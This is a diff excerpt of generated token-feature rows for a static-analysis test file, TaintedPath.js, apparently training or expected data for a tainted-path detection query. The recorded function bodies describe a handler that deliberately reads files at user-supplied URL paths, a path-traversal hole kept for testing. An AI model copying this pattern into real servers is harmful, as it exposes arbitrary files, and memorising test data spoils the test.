autogenerated/TaintedPath/TaintedPath.js:50:29:50:48 | pathModule.normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:48 | pathModule.normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | pathMod ... e(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | pathMod ... e(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | pathMod ... e(path) | calleeImports | fs | @@ -5076,6 +59851,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:50:29:50:54 | pathMod ... e(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:50:40:50:48 | normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:40:50:48 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:50:40:50:48 | normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:50:40:50:48 | normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:50:40:50:48 | normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:50:50:50:53 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/TaintedPath.js:50:50:50:53 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:50:50:50:53 | path | calleeImports | path | @@ -5085,6 +59865,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:50:50:50:53 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:50:50:50:53 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:50:50:50:53 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:3:52:58 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:7:52:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:7:52:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:7:52:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:7:52:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:7:52:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | exceptional return of fs.read ... path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | exceptional return of fs.read ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | exceptional return of fs.read ... path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | exceptional return of fs.read ... path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | exceptional return of fs.read ... path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | fs.read ... path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | fs.read ... path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | fs.read ... path)) | contextFunctionInterfaces | views_local(req, res) | @@ -5093,6 +59913,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | fs.read ... path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | fs.read ... path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:52:13:52:57 | fs.read ... path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:52:16:52:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:16:52:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:16:52:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:16:52:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:16:52:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:47 | pathModule.relative | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:47 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:47 | pathModule.relative | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:47 | pathModule.relative | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:47 | pathModule.relative | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | exceptional return of pathMod ... , path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | exceptional return of pathMod ... , path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | pathMod ... , path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | pathMod ... , path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | pathMod ... , path) | calleeImports | fs | @@ -5102,6 +59942,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | pathMod ... , path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | pathMod ... , path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:52:29:52:56 | pathMod ... , path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:52:40:52:47 | relative | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:40:52:47 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:52:40:52:47 | relative | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:52:40:52:47 | relative | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:52:40:52:47 | relative | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:52:49:52:49 | x | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/TaintedPath.js:52:49:52:49 | x | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:52:49:52:49 | x | calleeImports | path | @@ -5120,6 +59965,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:52:52:52:55 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:52:52:52:55 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:52:52:52:55 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | exceptional return of res.wri ... h, x))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | exceptional return of res.wri ... h, x))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | exceptional return of res.wri ... h, x))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | exceptional return of res.wri ... h, x))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | exceptional return of res.wri ... h, x))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | res.wri ... h, x))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | res.wri ... h, x))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | res.wri ... h, x))) | 